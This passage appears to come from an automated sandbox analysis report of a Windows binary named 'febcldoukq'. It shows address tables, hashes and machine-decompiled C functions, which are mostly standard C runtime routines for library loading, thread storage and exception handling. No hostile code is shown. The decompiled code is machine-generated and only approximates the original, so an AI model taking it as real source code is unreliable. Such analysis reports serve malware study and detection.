                                              0x00b1ed4c
                                              0x00b1ed4c
                                              0x00b1ed4e
                                              0x00b1ed50
                                              0x00b1ed52
                                              0x00b1ed54
                                              0x00b1ed54
                                              0x00b1ed54
                                              0x00b1ed57
                                              0x00b1ed57
                                              0x00b1ed5e
                                              0x00b1ed60
                                              0x00000000
                                              0x00b1ed66
                                              0x00b1ed66
                                              0x00b1ed6a
                                              0x00b1ed6e
                                              0x00b1ed6e
                                              0x00b1ed70
                                              0x00b1ed72
                                              0x00b1ed74
                                              0x00b1ed76
                                              0x00b1ed76
                                              0x00b1ed76
                                              0x00b1ed79
                                              0x00b1ed79
                                              0x00b1ed80
                                              0x00b1ed82
                                              0x00000000
                                              0x00b1ed88
                                              0x00b1ed88
                                              0x00b1ed8c
                                              0x00b1ed90
                                              0x00b1ed90
                                              0x00b1ed92
                                              0x00b1ed94
                                              0x00b1ed96
                                              0x00b1ed98
                                              0x00b1ed98
                                              0x00b1ed98
                                              0x00b1ed9b
                                              0x00b1ed9b
                                              0x00b1eda2
                                              0x00b1eda4
                                              0x00000000
                                              0x00b1edaa
                                              0x00b1edaa
                                              0x00b1edae
                                              0x00b1edb2
                                              0x00b1edb2
                                              0x00b1edb4
                                              0x00b1edb6
                                              0x00b1edb8
                                              0x00b1edba
                                              0x00b1edba
                                              0x00b1edba
                                              0x00b1edbd
                                              0x00b1edbd
                                              0x00b1edc4
                                              0x00b1edc6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b1edc6
                                              0x00b1eda4
                                              0x00b1ed82
                                              0x00b1ed60
                                              0x00000000
                                              0x00000000
                                              0x00b1f152
                                              0x00b1f155
                                              0x00b1f158
                                              0x00000000
                                              0x00b1f15e
                                              0x00b1f15e
                                              0x00b1f161
                                              0x00b1f165
                                              0x00b1f165
                                              0x00b1f167
                                              0x00b1f169
                                              0x00b1f16b
                                              0x00b1f16d
                                              0x00b1f16d
                                              0x00b1f16d
                                              0x00b1f170
                                              0x00b1f170
                                              0x00b1f177
                                              0x00b1f179
                                              0x00000000
                                              0x00b1f17f
                                              0x00b1f17f
                                              0x00b1f183
                                              0x00b1f187
                                              0x00b1f187
                                              0x00b1f189
                                              0x00b1f18b
                                              0x00b1f18d
                                              0x00b1f18f
                                              0x00b1f18f
                                              0x00b1f18f
                                              0x00b1f192
                                              0x00b1f192
                                              0x00b1f199
                                              0x00b1f19b
                                              0x00000000
                                              0x00b1f1a1
                                              0x00b1f1a1
                                              0x00b1f1a5
                                              0x00b1f1a9
                                              0x00b1f1a9
                                              0x00b1f1ab
                                              0x00b1f1ad
                                              0x00b1f1af
                                              0x00b1f1b1
                                              0x00b1f1b1
                                              0x00b1f1b1
                                              0x00b1f1b4
                                              0x00b1f1b4
                                              0x00b1f1bb
                                              0x00b1f1bd
                                              0x00000000
                                              0x00b1f1c3
                                              0x00b1f1c3
                                              0x00b1f1c7
                                              0x00b1f1cb
                                              0x00b1f1cb
                                              0x00b1f1cd
                                              0x00b1f1cf
                                              0x00b1f1d1
                                              0x00b1f1d3
                                              0x00b1f1d3
                                              0x00b1f1d3
                                              0x00b1f1d6
                                              0x00b1f1d6
                                              0x00b1f1dd
                                              0x00b1f1df
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b1f1df
                                              0x00b1f1bd
                                              0x00b1f19b
                                              0x00b1f179
                                              0x00000000
                                              0x00000000
                                              0x00b1e51d
                                              0x00b1e05f
                                              0x00b1e056
                                              0x00b1e04d
                                              0x00b1e044
                                              0x00b1f625
                                              0x00b1f628
                                              0x00b1df62
                                              0x00000000
                                              0x00b1df62
                                              0x00b1df60
                                              0x00b1df5e
                                              0x00000000
                                              0x00b1df67
                                              0x00b1df67
                                              0x00b1df69
                                              0x00b1df70
                                              0x00000000
                                              0x00b1df72
                                              0x00000000
                                              0x00b1df70
                                              0x00b1df35
                                              0x00000000

                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00B1DF07
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00B1DF0F
                                              • _ValidateLocalCookies.LIBCMT ref: 00B1DF98
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00B1DFC3
                                              • _ValidateLocalCookies.LIBCMT ref: 00B1E018
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: b62c552193824d84f0e89cf1805764eff89e21041f1cf536f46dd109a23c833e
                                              • Instruction ID: e623511831eae262cb4cda7576f79b2e20a434138fe1d7c2bc23fb160c2ad572
                                              • Opcode Fuzzy Hash: b62c552193824d84f0e89cf1805764eff89e21041f1cf536f46dd109a23c833e
                                              • Instruction Fuzzy Hash: 9941A430A00218ABCF14DF68D884ADEBBF5FF44324F5481D5F8199B396D731AA96CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B19950 Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CaretFocus$HideInvertRectReleaseShow
                                              • String ID:
                                              • API String ID: 4235554027-0
                                              • Opcode ID: 2c1a91ca20fc8188f6e2462604a9343a382a94bdd3068e21516e96606b2ab14d
                                              • Instruction ID: 9ac86f2107b090c0f026519e27fa326b8e56ffa5eb79a9575fe6a6acfd95b077
                                              • Opcode Fuzzy Hash: 2c1a91ca20fc8188f6e2462604a9343a382a94bdd3068e21516e96606b2ab14d
                                              • Instruction Fuzzy Hash: AA31B674A00248DFCB04DFA8D599AACBBF0FF08351F518469E889DB310DB34EA88CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B22369 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B22369(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0xb360b0 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0xb2cae0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0xb360b0 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0xb360b0 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00B24A59(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00B24A59(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                              0x00b22372
                                              0x00b22407
                                              0x00b2237a
                                              0x00b2237c
                                              0x00b22386
                                              0x00b2238b
                                              0x00b22398
                                              0x00b223ad
                                              0x00b223b1
                                              0x00b22417
                                              0x00b2241c
                                              0x00b22423
                                              0x00b22427
                                              0x00b2242a
                                              0x00b2242a
                                              0x00b22430
                                              0x00b22430
                                              0x00b22412
                                              0x00b22416
                                              0x00b22416
                                              0x00b223b3
                                              0x00b223bc
                                              0x00b223f5
                                              0x00b22402
                                              0x00b22404
                                              0x00b22404
                                              0x00000000
                                              0x00b22404
                                              0x00b223c6
                                              0x00b223cb
                                              0x00b223d0
                                              0x00000000
                                              0x00000000
                                              0x00b223da
                                              0x00b223df
                                              0x00b223e4
                                              0x00000000
                                              0x00000000
                                              0x00b223e9
                                              0x00b223ef
                                              0x00b223f3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b223f3
                                              0x00b22390
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b22396
                                              0x00b22410
                                              0x00000000

                                              APIs
                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00B22476,?,00B20F65,00000000,00000000), ref: 00B2242A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: api-ms-$ext-ms-
                                              • API String ID: 3664257935-537541572
                                              • Opcode ID: f978f5cbcb92852db7598db3b7d92a9f0b921f472228522d1491cedf6b1a9d2b
                                              • Instruction ID: 20bca3a75f9962b89177713fba457fb323e98317d7a75726abf922dda2aabd14
                                              • Opcode Fuzzy Hash: f978f5cbcb92852db7598db3b7d92a9f0b921f472228522d1491cedf6b1a9d2b
                                              • Instruction Fuzzy Hash: FE21D832A00131BBCB21A764BC45A5E37A8EB42760F3541A1ED1AE7390EF74ED01C6D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B21C7C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E00B21C7C(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xb34064 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00B25FC6(_t13,  *0xb34064);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00B26001(_t14,  *0xb34064, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00B20F42();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00B26001(_t18,  *0xb34064, 0);
								} else {
									_t8 = E00B26001(_t18,  *0xb34064, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00B20F4D(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                              0x00b21c7c
                                              0x00b21c83
                                              0x00b21c96
                                              0x00b21c9d
                                              0x00b21c9f
                                              0x00b21ca3
                                              0x00b21cbc
                                              0x00b21cbc
                                              0x00b21ca5
                                              0x00b21ca7
                                              0x00b21cba
                                              0x00b21cc1
                                              0x00b21cca
                                              0x00b21ccd
                                              0x00b21cd0
                                              0x00b21ce4
                                              0x00b21ce4
                                              0x00b21ced
                                              0x00b21cd2
                                              0x00b21cd9
                                              0x00b21cdf
                                              0x00b21ce2
                                              0x00b21cf6
                                              0x00b21cf8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b21ce2
                                              0x00b21cfb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b21cba
                                              0x00b21ca7
                                              0x00b21d03
                                              0x00b21d0d
                                              0x00b21c85
                                              0x00b21c87
                                              0x00b21c87

                                              APIs
                                              • GetLastError.KERNEL32(?,?,00B21C73,00B1DD33,00B1D88B), ref: 00B21C8A
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B21C98
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B21CB1
                                              • SetLastError.KERNEL32(00000000,00B21C73,00B1DD33,00B1D88B), ref: 00B21D03
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: e49d0e7973e5607cd1194d9360cff1521c19e60c32be052a62b16fd7662e7219
                                              • Instruction ID: e0e8a58acea770c7fdbef8a28e7343c197f1af0ff589fc35bad83ac9b213bd27
                                              • Opcode Fuzzy Hash: e49d0e7973e5607cd1194d9360cff1521c19e60c32be052a62b16fd7662e7219
                                              • Instruction Fuzzy Hash: 6E0184362493316EE62827BC7DC6A6B27D8DB6177573006BAF6198A0E1EF115C416244
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1B420 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                                              • String ID: d
                                              • API String ID: 3626877506-2564639436
                                              • Opcode ID: 6672da8c189a090c74ca2a8eeacfc38e68ae567af5aa9056ac078de7af9e0132
                                              • Instruction ID: e577c7c42e4a704d256124a40bc25d0c300ed9812047f15fda90afdbd29bd023
                                              • Opcode Fuzzy Hash: 6672da8c189a090c74ca2a8eeacfc38e68ae567af5aa9056ac078de7af9e0132
                                              • Instruction Fuzzy Hash: A571C074A002199FCB04CF58C098EADBBF1FF58315F1584A9E889EB362D735E981CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B13370 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: System
                                              • String ID: `
                                              • API String ID: 3470857405-2679148245
                                              • Opcode ID: 442bc46606c4a8f38fa5dd5347cf70bcb63a8faeb28042979c5bc695e3cdaf26
                                              • Instruction ID: b5136b2aa468f68832f29c024c94ac28a8f3000f7144733e7aefb40ba4b259d6
                                              • Opcode Fuzzy Hash: 442bc46606c4a8f38fa5dd5347cf70bcb63a8faeb28042979c5bc695e3cdaf26
                                              • Instruction Fuzzy Hash: 4B412EB8104209AFD740EF58D598B9ABBE4FB48314F11C45AEC688B362D7BAD948DF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B2001C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 25%
                                              			E00B2001C(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0xb34050; // 0xbb40e64e
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0xb2af36, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0xb37000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                              0x00b20031
                                              0x00b2003c
                                              0x00b20042
                                              0x00b20046
                                              0x00b20051
                                              0x00b20059
                                              0x00b20063
                                              0x00b20069
                                              0x00b2006d
                                              0x00b20074
                                              0x00b2007a
                                              0x00b2007a
                                              0x00b2006d
                                              0x00b20080
                                              0x00b20085
                                              0x00b20085
                                              0x00b2008e
                                              0x00b20098

                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00B2AF36,000000FF,?,00B200E6,00B1FF81,?,00B20182,00000000), ref: 00B20051
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B20063
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00B2AF36,000000FF,?,00B200E6,00B1FF81,?,00B20182,00000000), ref: 00B20085
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: ab66313bc57a6a9d5e748b7cffa3a4f72acfa2e7e6504bd9bd9eec66f18c0bb8
                                              • Instruction ID: 359d674de898b580c6d44c77fc354e8855b40164182eff533ca52c60af51ee95
                                              • Opcode Fuzzy Hash: ab66313bc57a6a9d5e748b7cffa3a4f72acfa2e7e6504bd9bd9eec66f18c0bb8
                                              • Instruction Fuzzy Hash: D8018F71954629ABDB219B54DC09FAFBBF8FB04B11F100679E811A22A0DB789900CA90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1A450 Relevance: 7.5, APIs: 5, Instructions: 47windowclipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: EnableItemMenu$AvailableClipboardFormat
                                              • String ID:
                                              • API String ID: 4217543366-0
                                              • Opcode ID: c61c3357539816e2a406996ca59341153eb6c1d00330968bb0ece31a6cabab77
                                              • Instruction ID: 4a844c2d417d2b25ff133560e3f31fd65101c68232be0a23b611669948dfd870
                                              • Opcode Fuzzy Hash: c61c3357539816e2a406996ca59341153eb6c1d00330968bb0ece31a6cabab77
                                              • Instruction Fuzzy Hash: 6911F874604214AFD704EF68D58979EBBE4EB84701F10C82DEC898B354DB75D8488B42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B27EA7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E00B27EA7(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E00B21C6E(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E00B21C6E(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E00B2430E(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E00B241BE(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00B27E27(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00B21BDC(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E00B26200(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E00B26200(_t65, _t83);
				}
			}






































                                              0x00b27ea7
                                              0x00b27ea7
                                              0x00b27ea7
                                              0x00b27eae
                                              0x00b27eb7
                                              0x00b27fd6
                                              0x00b27ebd
                                              0x00b27ebd
                                              0x00b27ebe
                                              0x00b27ebf
                                              0x00b27ec9
                                              0x00b27ecc
                                              0x00b27ed2
                                              0x00b27edc
                                              0x00b27f01
                                              0x00b27f06
                                              0x00b27f0b
                                              0x00b27fd2
                                              0x00000000
                                              0x00b27fd3
                                              0x00b27f0b
                                              0x00b27edc
                                              0x00b27f11
                                              0x00b27f14
                                              0x00b27f17
                                              0x00b27f1d
                                              0x00b27f35
                                              0x00b27f3a
                                              0x00b27f3d
                                              0x00b27f40
                                              0x00b27f43
                                              0x00b27f46
                                              0x00b27f4c
                                              0x00b27f52
                                              0x00b27f55
                                              0x00b27f58
                                              0x00b27f67
                                              0x00b27f68
                                              0x00b27f68
                                              0x00b27f6d
                                              0x00b27f80
                                              0x00b27f82
                                              0x00b27f87
                                              0x00b27f92
                                              0x00b27f94
                                              0x00b27f96
                                              0x00b27fb2
                                              0x00b27fb7
                                              0x00b27fba
                                              0x00b27fba
                                              0x00b27f92
                                              0x00b27f87
                                              0x00b27fc0
                                              0x00b27fc1
                                              0x00b27fc4
                                              0x00b27fc7
                                              0x00b27fca
                                              0x00b27fcd
                                              0x00b27f58
                                              0x00000000
                                              0x00b27f4c
                                              0x00b27fd7
                                              0x00b27fdc
                                              0x00b27fdd
                                              0x00b27fde
                                              0x00b27fdf
                                              0x00b27fee
                                              0x00b27ffe
                                              0x00b28005
                                              0x00b2800b
                                              0x00b2800c
                                              0x00b28018
                                              0x00b2801a
                                              0x00b2801a
                                              0x00b28029
                                              0x00b28029

                                              APIs
                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B27DAD,?,?,00000000,00000000,00000000,?), ref: 00B27ECC
                                              • CatchIt.LIBVCRUNTIME ref: 00B27FB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CatchEncodePointer
                                              • String ID: MOC$RCC
                                              • API String ID: 1435073870-2084237596
                                              • Opcode ID: 30f8db3a817e9b2e16fe87bdbe8ce176b3ecb5ea3df40d020c2c41ca4cf4a67e
                                              • Instruction ID: bd4dede3a8b957a8156d572288f01ba81ba09b77f97679863e6f080e84c8ed1d
                                              • Opcode Fuzzy Hash: 30f8db3a817e9b2e16fe87bdbe8ce176b3ecb5ea3df40d020c2c41ca4cf4a67e
                                              • Instruction Fuzzy Hash: C641AB72908299AFCF15CF98ED81AEEBBF5FF08304F144099F9086B211D7359950CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B131B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41timewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
